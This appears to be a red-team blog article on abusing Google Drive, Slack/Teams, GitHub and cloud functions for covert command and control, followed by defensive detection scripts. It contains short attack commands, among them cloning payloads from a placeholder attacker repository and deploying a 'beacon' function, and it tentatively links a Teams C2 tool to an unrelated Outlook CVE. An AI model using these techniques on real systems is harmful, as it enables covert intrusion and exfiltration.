
# Living Off the Cloud: Abusing Cloud Services for Red Teaming


***

#### Introduction: Blending into the Digital Skyline <a href="#f71f" id="f71f"></a>

Cyber threats today no longer rely on flashy malware or sketchy infrastructure. Modern adversaries, especially Advanced Persistent Threats (APTs), are turning to **trusted cloud services** to operate invisibly. This technique is called **Living Off The Cloud (LOTC)**, and it is rapidly becoming a staple of Red Team and nation-state toolkits.

Just as **Living Off the Land (LOTL)** relies on native OS tools, **LOTC relies on cloud infrastructure you probably already trust.**

#### Why it Works <a href="#b207" id="b207"></a>

**Cloud services are:**

* Widely used and trusted: firewalls and proxies usually allow their traffic.
* Encrypted by default: most use HTTPS, which makes inspection harder.
* Hard to blacklist: you can’t just block Google or Microsoft in most organizations.
* Globally available: attackers don’t need their own infrastructure, just an account.

## Red Teaming Use Cases <a href="#id-16d0" id="id-16d0"></a>

### **Command and Control via Google Drive or Dropbox**

#### **TTP Flow:**

* The attacker drops payloads into a shared cloud folder.
* The infected host polls the folder every 30 s via a scheduled task or beacon.
* Exfiltrated data (e.g., screenshots, keystrokes) is uploaded as new files.

#### **Tools:**

* `Sliver` + Google Drive API
* `gdrive`: CLI for file uploads/downloads

```
gdrive upload C2_payload.exe
gdrive download --path /tmp tasking.json
```

**Why it works:** Google Drive traffic blends in with normal productivity behavior.

### **Slack or Microsoft Teams as C2 Channels**

#### **TTP Flow:**

* A Slack bot posts commands in a private channel.
* Compromised endpoints poll the channel and execute them.
* Output is posted back as messages.

**Abuse Example:**

Slack webhook: [`https://hooks.slack.com/services/XXXX/YYYY/ZZZZ`](https://hooks.slack.com/services/XXXX/YYYY/ZZZZ)

**GitHub PoC:**

* `slack-shell`
* `TeamC2`: abusing Microsoft Teams (CVE-2023-23397 related abuse scenario)

**Reference:**

APT29 allegedly used Microsoft Teams to deliver malware-laced documents via chat in a 2023 attack.

> **Bonus:** Many orgs run Slack in the browser or as a native app; again, trusted traffic.

### **Payload Hosting via GitHub Repositories**

GitHub repositories (public or private) can host:

* Encrypted payloads or scripts
* Infrastructure-as-code (IaC) templates for dynamic infrastructure
* Configuration files used by implants

and they come with HTTPS and CDN delivery built in.

**Tool Example:**

* `gitC2`: C2 over GitHub repos.

```
git clone https://github.com/attacker/payloads.git

gpg --decrypt payload.bin.gpg
```

### **Persistence via Cloud Functions**

Cloud functions allow **event-driven execution** in the cloud, which makes them well suited to stealthy persistence.

**Platforms:**

* **AWS Lambda**
* **Google Cloud Functions**
* **Azure Functions**

**Red Team Use:**

* Trigger C2 beacon on HTTP request
* Inject shellcode into warm function containers
* Auto-deploy second-stage payloads

```
gcloud functions deploy beacon --runtime python39 --trigger-http
```

## Blue Teams: Defending Against LOTC <a href="#f0fd" id="f0fd"></a>

Defending against LOTC is challenging, but not impossible. Here’s what Blue Teams and defenders should be doing:

### **Monitor for Anomalous Cloud Service Use**

* **OAuth token abuse:** Unknown apps with high permissions
* **Personal cloud storage:** Used from corporate devices
* **API usage spikes:** Especially to Slack, GitHub, Dropbox
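One way to put the first bullet into practice, as an added example that is not from the original page: the script below aggregates OAuth consent events per application, rates the granted scopes, and reports apps outside an approval allowlist that hold any high-risk scope. The event fields, client ids and allowlist are constructed assumptions; the scope names are modelled on real Google API and Microsoft Graph scope names, but the risk weights are this example's own.

```python
"""Review OAuth consent grants for unknown apps with broad permissions.

Added example (not from the original page). The consent records below are
constructed and the field names are assumptions, not a specific platform's
audit-log schema. Scope names are modelled on Google API and Microsoft
Graph scopes; the risk weights are this example's own choice.
"""
from collections import defaultdict

# Risk weight per scope: full-drive, full-mailbox or directory-wide access is
# rated high, basic identity scopes are rated zero.
SCOPE_RISK = {
    "openid": 0,
    "email": 0,
    "profile": 0,
    "https://www.googleapis.com/auth/drive.file": 1,
    "https://www.googleapis.com/auth/drive": 3,
    "https://www.googleapis.com/auth/gmail.readonly": 3,
    "Mail.Read": 3,
    "Files.ReadWrite.All": 4,
    "Directory.ReadWrite.All": 5,
}
HIGH = 3

# Apps the organisation has reviewed and approved (client ids are constructed).
APPROVED_APPS = {"approved-backup-tool-client-id"}

# Constructed consent events: who granted which scopes to which app.
SAMPLE_CONSENTS = [
    {"user": "alice@example.com", "app": "Backup Tool", "client_id": "approved-backup-tool-client-id",
     "scopes": ["https://www.googleapis.com/auth/drive"]},
    {"user": "bob@example.com", "app": "PDF Helper", "client_id": "pdf-helper-client-id",
     "scopes": ["openid", "email", "https://www.googleapis.com/auth/drive.file"]},
    {"user": "carol@example.com", "app": "Mail Sync Pro", "client_id": "mail-sync-client-id",
     "scopes": ["Mail.Read", "Files.ReadWrite.All"]},
    {"user": "carol@example.com", "app": "Mail Sync Pro", "client_id": "mail-sync-client-id",
     "scopes": ["Mail.Read", "Files.ReadWrite.All", "Directory.ReadWrite.All"]},
]


def review_consents(events, approved=APPROVED_APPS, high=HIGH):
    """Return findings for apps not on the allowlist that hold at least one high-risk scope.

    Each finding carries the app's peak risk, the users who consented and the
    high-risk scopes involved, so an analyst can triage the worst first.
    """
    per_app = defaultdict(lambda: {"app": None, "users": set(), "scopes": set()})
    for ev in events:
        entry = per_app[ev["client_id"]]
        entry["app"] = ev["app"]
        entry["users"].add(ev["user"])
        entry["scopes"].update(ev["scopes"])

    findings = []
    for client_id, entry in per_app.items():
        if client_id in approved:
            continue
        # A scope we have no rating for is treated as high: better an analyst
        # looks at it than the tool silently ignores it.
        risky = {s for s in entry["scopes"] if SCOPE_RISK.get(s, high) >= high}
        if not risky:
            continue
        peak = max(SCOPE_RISK.get(s, high) for s in risky)
        findings.append({"client_id": client_id, "app": entry["app"], "risk": peak,
                         "users": sorted(entry["users"]), "high_risk_scopes": sorted(risky)})
    return sorted(findings, key=lambda f: f["risk"], reverse=True)


if __name__ == "__main__":
    for f in review_consents(SAMPLE_CONSENTS):
        print(f"[risk {f['risk']}] {f['app']} ({f['client_id']}) -> {f['users']}: {f['high_risk_scopes']}")
```

Run against the constructed events, only "Mail Sync Pro" is reported: the approved backup tool is skipped even though it holds full Drive access, and the PDF helper only holds per-file scope. The allowlist is keyed on the client id rather than the display name because an attacker-registered app can pick any name it likes.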

### **Inspect DNS and HTTPS Metadata**

Even when payloads are encrypted, the metadata still shows patterns such as:

* Repeated traffic to non-standard subdomains
* Odd timing patterns (e.g., beaconing every 30 s)
* Known cloud URLs used in unusual ways
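The timing bullet is the easiest to automate. As an added example (not part of the original page), the script below reads a constructed proxy log, groups requests by source and destination host, and flags flows whose inter-request gaps are almost perfectly regular, which is what a 30 s poll of a Drive or Slack endpoint looks like from the proxy; near-constant response sizes are reported as a corroborating signal. The log format, thresholds and hostnames are assumptions.

```python
"""Flag beacon-like polling to cloud services in proxy logs.

Added example (not from the original page). The log lines are constructed
in a simple space-separated form; adapt parse() to your proxy's format.
The thresholds are starting points, not tuned values.
"""
from collections import defaultdict
from datetime import datetime
from statistics import mean, pstdev

# Constructed sample: "<ISO timestamp> <src_ip> <dest_host> <bytes>".
# 10.1.2.3 hits the Drive API exactly every 30 s; 10.1.2.9 is a person using Docs.
SAMPLE_LOG = """\
2024-05-01T09:00:00Z 10.1.2.3 www.googleapis.com 812
2024-05-01T09:00:30Z 10.1.2.3 www.googleapis.com 815
2024-05-01T09:01:00Z 10.1.2.3 www.googleapis.com 809
2024-05-01T09:01:30Z 10.1.2.3 www.googleapis.com 811
2024-05-01T09:02:00Z 10.1.2.3 www.googleapis.com 814
2024-05-01T09:02:30Z 10.1.2.3 www.googleapis.com 810
2024-05-01T09:00:07Z 10.1.2.9 docs.google.com 4520
2024-05-01T09:00:41Z 10.1.2.9 docs.google.com 120993
2024-05-01T09:03:15Z 10.1.2.9 docs.google.com 8822
2024-05-01T09:11:02Z 10.1.2.9 docs.google.com 3310
2024-05-01T09:12:58Z 10.1.2.9 docs.google.com 77001
2024-05-01T09:20:04Z 10.1.2.9 docs.google.com 650
"""

MIN_EVENTS = 6      # need enough samples before judging regularity
MAX_CV = 0.15       # coefficient of variation of the gaps; lower means more machine-like
MAX_SIZE_CV = 0.10  # near-constant response sizes are a second tell


def parse(log_text):
    """Yield (timestamp, src, host, size) from the constructed log form."""
    for line in log_text.splitlines():
        if not line.strip():
            continue
        ts, src, host, size = line.split()
        yield datetime.strptime(ts, "%Y-%m-%dT%H:%M:%SZ"), src, host, int(size)


def find_beacons(log_text, min_events=MIN_EVENTS, max_cv=MAX_CV, max_size_cv=MAX_SIZE_CV):
    """Return {(src, host): summary} for flows whose request gaps are suspiciously regular."""
    flows = defaultdict(list)
    for ts, src, host, size in parse(log_text):
        flows[(src, host)].append((ts, size))

    hits = {}
    for key, events in flows.items():
        if len(events) < min_events:
            continue
        events.sort()
        gaps = [(b[0] - a[0]).total_seconds() for a, b in zip(events, events[1:])]
        sizes = [s for _, s in events]
        gap_cv = pstdev(gaps) / mean(gaps) if mean(gaps) else 0.0
        size_cv = pstdev(sizes) / mean(sizes) if mean(sizes) else 0.0
        if gap_cv > max_cv:
            continue  # human traffic: bursts and long pauses, not a metronome
        hits[key] = {
            "count": len(events),
            "mean_gap_s": round(mean(gaps), 1),
            "gap_cv": round(gap_cv, 3),
            "size_regular": size_cv <= max_size_cv,
        }
    return hits


if __name__ == "__main__":
    for (src, host), info in find_beacons(SAMPLE_LOG).items():
        print(f"{src} -> {host}: {info}")
```

On the sample, only the 10.1.2.3 flow is reported (mean gap 30 s, zero variation, near-constant size); the Docs user's bursts and pauses push the gap variation well past the threshold. Real implants usually add random jitter, so in production raise the threshold, look at the distribution of gaps rather than a single statistic, and compare each host against its own baseline of normal Drive or Slack traffic.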

### **Log Everything You Can**

* Enable audit logs on cloud platforms (e.g., Google Workspace, M365).
* Monitor file-sharing activity and access patterns.
* Look for out-of-place automation, such as rogue bots, unknown Lambda functions, or GitHub webhook abuse.
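For the last bullet, an added example (not from the original page) of what reviewing cloud audit logs for rogue automation can look like: it reads constructed CloudTrail-style records for AWS Lambda, reports function code created or updated by anyone outside a CI deploy role, and reports function URLs configured without authentication. The record fields are reduced to what the check needs, the principal ARNs and function names are constructed, and the event names are assumed to match CloudTrail's Lambda naming; verify them against your own trail before relying on the list.

```python
"""Spot unexpected Lambda deployments in CloudTrail records.

Added example (not from the original page). The records are constructed and
cut down to the fields used here. The event names are assumed to follow
CloudTrail's naming for Lambda API calls; check them against a real trail.
The deploy-role ARN and account id are placeholders.
"""
import json

# Principals allowed to create or change function code (constructed placeholder ARN).
DEPLOY_PRINCIPALS = {"arn:aws:sts::111122223333:assumed-role/ci-deploy-role/github-actions"}

# Event names that introduce or change executable code, and that expose it over HTTP.
CODE_EVENTS = {"CreateFunction20150331", "UpdateFunctionCode20150331"}
URL_EVENTS = {"CreateFunctionUrlConfig20211001", "UpdateFunctionUrlConfig20211001"}

# Constructed trail: a normal CI deploy, then a one-off user creating a function
# at 03:40 and exposing it with an unauthenticated URL, then a harmless read.
SAMPLE_TRAIL = """\
{"eventTime":"2024-05-01T03:12:44Z","eventName":"UpdateFunctionCode20150331","userIdentity":{"arn":"arn:aws:sts::111122223333:assumed-role/ci-deploy-role/github-actions"},"requestParameters":{"functionName":"orders-api"},"sourceIPAddress":"203.0.113.10"}
{"eventTime":"2024-05-01T03:40:02Z","eventName":"CreateFunction20150331","userIdentity":{"arn":"arn:aws:iam::111122223333:user/contractor-temp"},"requestParameters":{"functionName":"beacon"},"sourceIPAddress":"198.51.100.77"}
{"eventTime":"2024-05-01T03:40:30Z","eventName":"CreateFunctionUrlConfig20211001","userIdentity":{"arn":"arn:aws:iam::111122223333:user/contractor-temp"},"requestParameters":{"functionName":"beacon","authType":"NONE"},"sourceIPAddress":"198.51.100.77"}
{"eventTime":"2024-05-01T09:05:11Z","eventName":"GetFunction20150331v2","userIdentity":{"arn":"arn:aws:iam::111122223333:user/analyst"},"requestParameters":{"functionName":"orders-api"},"sourceIPAddress":"203.0.113.22"}
"""


def audit_lambda_events(trail_text, deploy_principals=DEPLOY_PRINCIPALS):
    """Return findings: code changes by non-deploy principals and unauthenticated function URLs."""
    findings = []
    for line in trail_text.splitlines():
        if not line.strip():
            continue
        ev = json.loads(line)
        name = ev["eventName"]
        actor = ev["userIdentity"]["arn"]
        params = ev.get("requestParameters") or {}
        fn = params.get("functionName", "?")

        if name in CODE_EVENTS and actor not in deploy_principals:
            findings.append({"time": ev["eventTime"], "function": fn, "actor": actor,
                             "source_ip": ev.get("sourceIPAddress"),
                             "reason": "function code deployed outside the CI deploy role"})

        if name in URL_EVENTS:
            auth = params.get("authType", "?")
            # A function URL with authType NONE is a public HTTP trigger; flag it
            # regardless of who set it, and flag any URL set by a non-deploy principal.
            if auth == "NONE" or actor not in deploy_principals:
                findings.append({"time": ev["eventTime"], "function": fn, "actor": actor,
                                 "source_ip": ev.get("sourceIPAddress"),
                                 "reason": f"function URL configured (authType={auth})"})
    return findings


if __name__ == "__main__":
    for f in audit_lambda_events(SAMPLE_TRAIL):
        print(f"{f['time']} {f['function']:<12} {f['reason']} by {f['actor']} from {f['source_ip']}")
```

Against the constructed trail the CI update and the analyst's read pass quietly, while the `beacon` function produces two findings: a create by a principal that never deploys code, and a public, unauthenticated URL on it thirty seconds later. In practice, feed this from CloudTrail Lake or an S3-delivered trail and keep the allowlist in version control next to the deployment pipeline it describes.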

### **Analyze DNS + HTTPS Metadata**

Even if payloads are encrypted, behaviours reveal intent:

(The original shows a table of telltale behaviours here as an image.)

## CVEs, Zero-Days, and Weaknesses Enabling LOTC <a href="#id-756c" id="id-756c"></a>

(The original presents this section as an image of a table of CVEs and weaknesses.)

## Future of LOTC: AI-Enhanced Attacks? <a href="#d397" id="d397"></a>

With the rise of **GenAI and cloud**, imagine:

* GPT-generated phishing via Microsoft 365
* Dynamic payload generation hosted on GitHub Actions
* AI-controlled implants communicating via AI APIs (e.g., OpenAI, Anthropic)

## Try it Yourself <a href="#id-26ef" id="id-26ef"></a>

To simulate a Red Team scenario using cloud-based C2, check out:

* **Mythic C2 Framework:**

{% embed url="https://github.com/its-a-feature/Mythic" %}

* **Sliver C2:**

{% embed url="https://github.com/BishopFox/sliver" %}

* **Red Canary’s Atomic Red Team Cloud TTPs:**

{% embed url="https://github.com/redcanaryco/atomic-red-team" %}


